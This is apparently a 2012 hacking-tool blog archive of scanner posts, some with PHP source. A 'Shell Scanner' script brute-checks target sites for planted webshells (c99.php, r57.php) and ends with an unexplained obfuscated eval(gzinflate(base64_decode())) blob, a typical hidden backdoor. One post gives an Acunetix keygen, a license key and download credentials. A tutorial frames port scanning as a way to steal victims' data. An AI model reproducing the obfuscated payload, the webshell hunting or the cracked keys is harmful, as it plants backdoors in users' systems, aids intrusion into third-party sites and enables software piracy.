Latest Post
Showing posts with label Scanner. Show all posts
Showing posts with label Scanner. Show all posts

Gamja : Web vulnerability scanner

Written By Unknown on Saturday, 29 December 2012 | 01:48



Gamja will find XSS(Cross site scripting) & SQL Injection weak point also URL parameter validation error. Who knows that which parameter is weak parameter? Gamja will be helpful for finding vulnerability[ XSS , Validation Error , SQL Injection].

Supported platform:
Windows ,Linux,Mac 

download:

http://sourceforge.net/projects/gamja/
credit: DeCrew

SynScan

Written By Unknown on Wednesday, 19 December 2012 | 05:19


A fast half-open portscanner. This tool will send TCP packets with the SYN flag set at the destination address. SynScan will send traffic as fast as the host network interface can support.
Based on SynScan version 1.6 by psychoid/tCl (http://www.psychoid.lam3rz.de) with the following changes:
  • Fixes for several format string overflows and other bugs
  • Split into multiple programs for sending and receiving of SYN packets
  • Added a seperate "sslog" tool which only logs open ports and doesn't perform further checks
  • Support for identifying samba servers in synscand
  • Support for querying the Server: header on HTTP servers
  • Support for Open X11 server scanning
  • Ported to Solaris and IRIX operating systems
  • Adjusted scan timing to provide for much faster network scanning
  • Added support for IPv6 (currently in beta)

Screen Shots

Versions

SynScan 3.1

This is the current stable version, and should compile on modern versions of Linux, Solaris and IRIX. This is the currently recommended version.

SynScan 3.9

SynScan 3.9 is an early development version of the forthcoming SynScan 4.0. It is currently able to scan IPv6 networks and detect open ports, however there are many limitations in the current beta version. As far as i know, SynScan 3.9 is the first IPv6 half-open scanning tool.
  • No support for IPv4 (future versions will let you switch between v4/v6)
  • No support for synscand (only sslog is functional sofar)
  • Tested on Linux and MacOS

SynScan 3.9b3

  • The sslog tool now supports IPv4 and IPv6 in the same binary
  • Minor bugfixes and updates, mostly in the sslog tool

SynScan 3.9b4

  • Now includes seperate synscan and synscan6 binaries for IPv4/IPv6 respectively
This version should be fully functional, supporting everything supported by the previous 3.1 version, while also allowing IPv6 port scanning. It has only been tested on Linux.

SynScan 3.9b5

  • Now includes a port to MacOSX, supporting both IPv4 and IPv6 and has been tested on OSX 10.4.x (Tiger) on PPC
  • Fixed a divide by zero error when scanning a small number of hosts/ports such that the scan took less than 1 second.

SynScan 3.9b6

  • Fixed two minor bugs, ipv6 output wasn't being written to the output file, and ipv4 output wasn't being flushed to the output file (and so would only be written periodically)

SynScan 3.9b7

  • Now correctly working on MacOSX/Intel

Developer

Download


 source : http://www.bindshell.net/

Acunetix Web Vulnerability Scanner 8.x Enterprise Edition KeyGen

Written By Unknown on Saturday, 8 December 2012 | 00:32


       This is a network vulnerability scanning tools. Web crawler to test your website security, testing the popular attacks such as cross-site scripting, sql injection. Been hacked before scanning cart, forms, security zones and other Web applications. 75% of Internet attacks target Web-based applications. Because they often access to confidential data and is placed before the firewall.

2012.05.11-original Enterprise Edition is not the most expensive, it is updated with the most expensive version of the key to do RI.

Official original download address: http://www.acunetix.com/download/fullver8
ID: acunetixwvsfullv8 PASSWORD: nFu834! 29bg_S2q

Found that does not support the directory listing, direct to a new version of the download path can also automatically install this upgrade:

Description: first official address to download the latest Enterprise Edition installation package [RI only supports the Enterprise Edition does not support the free version] to close the program after the installation is complete, open the crack, Point Patch registered the following registration information, registration then support normal upgrade!

Do not be used for illegal purposes, or peril! 
License Key:   5s3b6136t52s56de60d1e76fgd4f7d5h
Name: Hmily / [LCG]
ComPany: Www.52PoJie.Cn
Email: Hmily@Acunetix.com
Telephone: 110

Acunetix_Web_Vulnerability_Scanner_8.x_Consultant _Edition_KeyGen.exe
MD5: 6EF77924A7D92E6FF168053E3B4A5814
Acunetix_Web_Vulnerability_Scanner_8.x_Consultant_Edition_KeyGen_Hmily [LCG]. Rar
MD5: 302C3EC2C7F726E253400CAB654C7AF5

Forum download:

Network disk download:

source :  http://hi.baidu.com

LFI & RFI Scanner

Written By Unknown on Tuesday, 20 November 2012 | 14:37



[+]New gui
[+]Portable
[+]More paths from any other
[+]More bypass methods from any other


[+]LFI-classic LFI test includes 20160 test
[+]LFI Bypass Method 1-includes 15435 test
[+]LFI Bypass Method 2-includes 96 test
[+]LFI Bypass Method 3-includes 3904 test
[+]RFI vulnerability test
[+]includes simple instructions
[+]Redirect url to alboraaq community

http://dl.dropbox.com/u/74694499/BlueBlack%20V%201.4%20%284%29.exe 

login password:alboraaq
unrar password:alboraaq 

Credit to  ~BK~  

Shell Scanner 100% work

Written By Unknown on Monday, 12 November 2012 | 14:45


<head>
<p align="center">
<img border="0" src="http://ml0k.org/uploads/images/ml0k.org-d935f6c026.jpg"</p>
<title>Shell'z Founder By Dr.shay3n </title>
<style>
body{background-color:#000000;color:#000000;}
body,td,th{ font: 8pt Lucida,Tahoma;margin:0;vertical-align:top;color:#000000; }
table.info{ color:#000;background-color:#000000; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:7px solid $color;padding: 3px 5px;font: 14pt
Verdana;background-color:#333;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#222; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #555;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{
margin:0;color:#999;background-color:#222;border:1px solid $color;
font: 8pt Tahoma,'Tahoma'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
.found {
color: #008000;
font-weight: bold;
}
.Dr.shay3n {
color: #FFFF00;
font-weight: bold;
}
.scan {
color: #FFFFFF;
font-weight: bold;
}
.start {
color: #FFFFFF;
font-weight: bold;
}
// -->
</style>
</head>

<body>


<p align="center">&nbsp;</p>

<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font color="#FFFFFF" size="5">Find Shell'z :D</font></p><br>
<form method="POST">
</form><center>
<form action="" method="post">
<input name="traget" type="text" size="40" value="http://www.site.com/"/><br>
<br><br>
<input name="scan" size="100" value="Start Scaning" type="submit">
</form>

<?php

set_time_limit(0);

if (isset($_POST["scan"])) {  //By Dr.shay3n


$url = $_POST['traget'];


echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";


echo "ReSulT:<br /><br />";


//You Can Add Shellz Guyz  // Dr.shay3n


$shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php",

"Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.

php","whmcs.php",

"vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-

system/disqus.php",

"d0mains.php","wp-

content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",

"wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-

generator/sitemap-core.php#",

"wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-

h.php","tmp/user.php","tmp/Sym.php","cp.php",

"tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.p

hp","tmp/cpn.php",

"tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.ph

p",

"whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-

content/plugins/akismet/admin.php",

"templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.p

hp","vb.zip","vb.rar",

"admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sy

m.php",

"/r57.php","/wp-content/plugins/disqus-comment-

system/disqus.php","/shell.php","/sa.php","/admin.php",

"/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php

","shell.php","/amad.php",

"/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/hom

e.tar.gz",

"/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/erro

r_log","/error",

"/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
"wp-content/plugins/disqus-comment-

system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",

"tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
"tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.ph

p","Symlink.pl",

"forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php",
"xd.php", "c100.php",
"spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/adm

in.php",

"Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-

admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",

"tmp/cgi.pl","downloads/dom.php","templates/ja-helio-

farsi/index.php","webadmin.html","admins.php",

"/wp-content/plugins/count-per-day/js/yc/d00.php",
"admins/","admins.asp","admins.php","wp.zip");

//Start Scan

foreach ($shells as $shell){
$headers = get_headers("$url$shell"); // By Dr.shay3n
if (eregi('200', $headers[0])) {
//Result
    echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done
:D</span><br /><br/><br/>"; // By Dr.shay3n
    $dz = fopen('shells.txt', 'a+');
    $suck = "$url$shell";
    fwrite($dz, $suck."\n");
}
}
//Result In Text File (shellz.txt)
echo "<span class='Dr.shay3n'>You Will Find Shell'z here [ <a
href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
}
?></center>
<br><p align="center">
<p align="center"><font color="#FF6600" face="Cooper Black"
size="8">Dr.shay3n # COd3r</font></p>
<p><center>
<font color="#0000FF" face="Britannic Bold" size="4">www.hack-book.org</font>
</p>
</body>

</html>


<?php
eval(gzinflate(base64_decode('jVLvb9owEP3uv

+I4IRkkCqjS9iE0qJuUqUhrywh0mgKKnMQQr/lhxU4rNvV/r50AY1q17UMU++69d

+d3133mEbjQDX1v8eAtArxZLufhzb2/xM2EQFcU339LL7wvK89fhqvFrAVEZbI3CPR

2+9CXIuEVrIuV4tUdy7kDOEx1ninJY8GyOGWV6nU1i7e7JKB1YSB004chros5U

+prWSUO

+RtFPhuIoVjGLVeK7bizLtBevQtT9IlXb9UkvdML6NkLDkJH5uVbVPhFxfYf3n249bClEr

IuZnMHCBovciayHhY7ppmWe1Zdjsfj652NDuMyxwH6Kc8ySLWWzmjUNc5be3EA2Li

I/QnhcVoCvYqmV1HVfHQoUxk2TvX6Q9qER9GUnqDbssqBxVqUhYsIOddpmbgoS6

UReBHrveQu5nWmhWSVHln8RWJaRLCiLtYyK5kZGwIhIjm7nxURhaw1tFJbkfEjtz0r8

cOc341xegC2ydAo4YGk6igXpiFboI0T8sSy2qRWTT3DbVqzRcW2ZzZubnYwoBZMN

+CaDTsAoQ8/LeQ6LuXeDOfT7LPnB9S2QjcB1bkM270awB/Jw8IZBTg53crCx2/AHp

kav4eA6Y1pL2XxI6+O04NOp2ONP81lAi+EZ4r/W+o/hF5eAQ==')));
?>


****************************************
credit to  Dr.shay3n 

Admin and Login finder DW Tools

Written By Unknown on Wednesday, 17 October 2012 | 16:23

Posted Image

Download includes (.rar):

--- DW Admin and Login Finder v1.1.exe
--- DW LFI Scanner v1.0.exe
--- DW Quick System Grabber v1.1.exe (*NEW*)
--- Read me.txt
--- Junk file - you can delete this.mp4 ---> This is only to pump it for Hotfile

CVE-2012-2122 MySQL password vulnerability scanner

Written By Unknown on Saturday, 13 October 2012 | 03:48

Posted Image
Not sure if the latest headline-grabbing MySQL vulnerability (CVE-2012-2122) has put your infrastructure at risk? As outlined in this MySQL blog post by HD Moore, this vulnerability will accept every 256th login, no matter what password you use. There's no need to be in the dark about if your organization is at risk of CVE-2012-2122. Our free vulnerability scanning tool, ScanNow, will tell you if you have this MySQL vulnerability on your systems.
Try our free ScanNow tool today and check if your MySQL servers are at risk from the MySQL CVE-2012-2122 vulnerability.

download >> http://downloads.met...E-2012-2122.exe

System Requirements:

  • OS: Windows XP / Vista / Windows 7 / Server 2003 / Server 2008 (32bit or 64bit)
  • HD Space: 10 MB of disk space
  • RAM: 1GB minimum, 2GB or more recommended
  • Java Version: 1.6 and later
credit: http://www.rapid7.com/ 

What is Port Scanner?

Written By Unknown on Tuesday, 9 October 2012 | 07:38

Posted Image
In my last post i gave you the list of best port scanner tools. In this post i will explain about port scanning process and use of port scanning.

Port Scanning:
Port scanning is the process of searching for active or opened ports in victim system. Just like a thief searching for gate opened house. Consider this scanning



Starting Scan.

Target Host: www.yourcompany.com or IP Address

TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrpc)
Finished.


It shows the active ports in that domain or ip address


What is the Use?
what we can do with these ports? we can communicate with the victim system remotely using those active ports. So we can get their data without their knowledge.(The thing is that you can theft their data).


Scanning for open ports is done in two ways.

  • Scan a single IP address for open ports:
    It just like a thief who searching for any opened gate in single house.
    In relation to scanning, the gate is port and house is IP address.
    We are searching for the active port in a single IP address
    Eg:
    searching for active ports only at 123.xx.xx.xx
  • Scan a range of IP address to find open ports:
    Scanning a range of IP address is like thief who searching for any opened gate in a street. In relation to scanning, the gate is ports and street is range of ip address

    Eg:
    searching active ports only at
    123.20.xx.xx to 123.30.xx.xx

<a href="http://www.breakthesecurity.com/2010/12/some-of-best-port-scanning-tools.html">Port Scanning Tools >> Download:
http://nmap.org/download.html
Superscan 
A Windows-only port scanner, pinger, and resolver SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.
From

http://www.foundstone.com/
Download

http://www.foundstone.com/us/resources/proddesc/superscan4.html

Angry IP Scanner 
A fast windows IP scanner and port scanner. Angry IP Scanner can perform basic
host discovery and port scans on Windows. Its binary file size is very small compared to other scanners and other pieces of information about the target hosts can be extended with a few plugins.

From

http://www.angryziber.com/
Download

http://www.angryziber.com/w/Download

Unicornscan :
Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering
and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses.

From

http://www.unicornscan.org/
Download

http://www.unicornscan.org/

safe3wvs - web vulnerability scanner with AI spider crawling

Posted Image

Safe3WVS is one of the most powerful web vulnerability scanner with AI on-the-fly web spider crawling technology helps to identify known and unknown vulnerabilities within the Web application layer.Especially when scans web portals ,you will find it is the most fast tool to dig vulnerabilities such as sql injection, cross-site scripting, upload vulnerability, and more.

Features:

Full support for Basic, Digest, NTLM http authentications.
Intelligent web spider automatic removes repeated web pages,this is one reason why it is so damn fast.
SQL injection state scanning technology can find vulnerabilities even when WAF or HIPS protectes the site.
An automatic javascript analyzer allows for extracting urls from Ajax, Web 2.0 and any other applications.
Support to scan SQL injection, XSS, upload vulnerability, admin path, potential vulnerability, directory list vulnerability and any other vulnerabilities such as svn information leakage.

http://safe3wvs.googlecode.com/files/Safe3WVS-8.1.rar

Joomla Server Scanner

Written By Unknown on Tuesday, 2 October 2012 | 06:43


Here is a demo link uploaded by me .
 http://www.onlineshoppingbangladesh.com/jmscan.php
<html>
<head>
<meta http-equiv="Content-Language" content="fr">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>~ JooMla serv3r ScaNN3r ~</title>
<style>
body
,table{background: black; color: lime; font-size:13px; }
A
:link {text-decoration: none;color: red;}
A
:active {text-decoration: none;color: red;}
A
:visited {text-decoration: none;color: red;}
A
:hover {text-decoration: underline; color: red;}
#new,input,table,td,tr,#gg{border-style:solid;text-decoration:bold;}
input
:hover,tr:hover,td:hover{background-color: #FFFFCC; color:green;}
</style>
</head>
<body>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font size="5" color=#ff40a0>~# <font size="7" color=#00c0ff> JooMla Serv3r ScaNN3r</font></p><br>
<form method="POST">
   
<p align="center"><input type="text" name="site" size="65"  style="border:1px dotted #60c0ff; font-family:Tahoma; font-size:10pt; color:red; background-color:#000000"><input type="submit" value="ScaN" style="border:1px dotted lime; font-family:Tahoma; font-size:10pt; color:red; background-color:#000000"></p>
</form><center>
<?php@set_time_limit(0);
@error_reporting(E_ALL | E_NOTICE);




function sec($site){
preg_match_all
('{http://(.*?)(/index.php)}siU',$site, $sites);
if(eregi("www",$sites[0][0])){
return $site=str_replace("index.php","",$sites[0][0]);
}else{
return $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));
}}

$npages
= 50000;
if ($_POST)
{
  $ip
= trim(strip_tags($_POST['site']));
  $npage
= 1;
  $allLinks
= array();


   
while($npage <= $npages)
 
{
 
  $x
=@file_get_contents('http://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage);

 
   
if ($x)
   
{
        preg_match_all
('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $x, $findlink);
       
       
foreach ($findlink[1] as $fl)
       
        $allLinks
[]=sec($fl);
       
       
        $npage
= $npage + 10;
       
       
if (preg_match('(first=' . $npage . '&amp)siU', $x, $linksuiv) == 0)
           
break;              
   
}
   
   
else
       
break;
 
}


$allDmns
= array();
foreach ($allLinks as $kk => $vv){

$allDmns
[] = $vv;
}
           
echo
'<table border="1"  width=\"80%\" align=\"center\">
<tr><td width=\"30%\"><b><font color="#00c020">Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </font></b></td><td><b>'
.$ip.'</b></td></tr>            
<tr><td width=\"30%\"><b><font color="#00c020">Sites Found&nbsp; : </font></b></td><td><b><font color="#ffff40">'
.count(array_unique($allDmns)).'</font></b></td></tr>
</table>'
;
echo
"<br><br>";

echo
'<table border="1" width="80%" align=\"center\">';
foreach(array_unique($allDmns) as $h3h3){

echo
'<tr id=new><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td>';


}

echo
"</table>";
}
?></center>
<br><p align="center"><font size="3">
<font color="#00c0ff">~# <font color="#00ffa0"></b>Coded By <b> <font color="#ff60a0"> Challenges-HackerS<b>
</body>
</html>
credit to mhu@larm
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Turorial Grapich Design and Blog Design - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger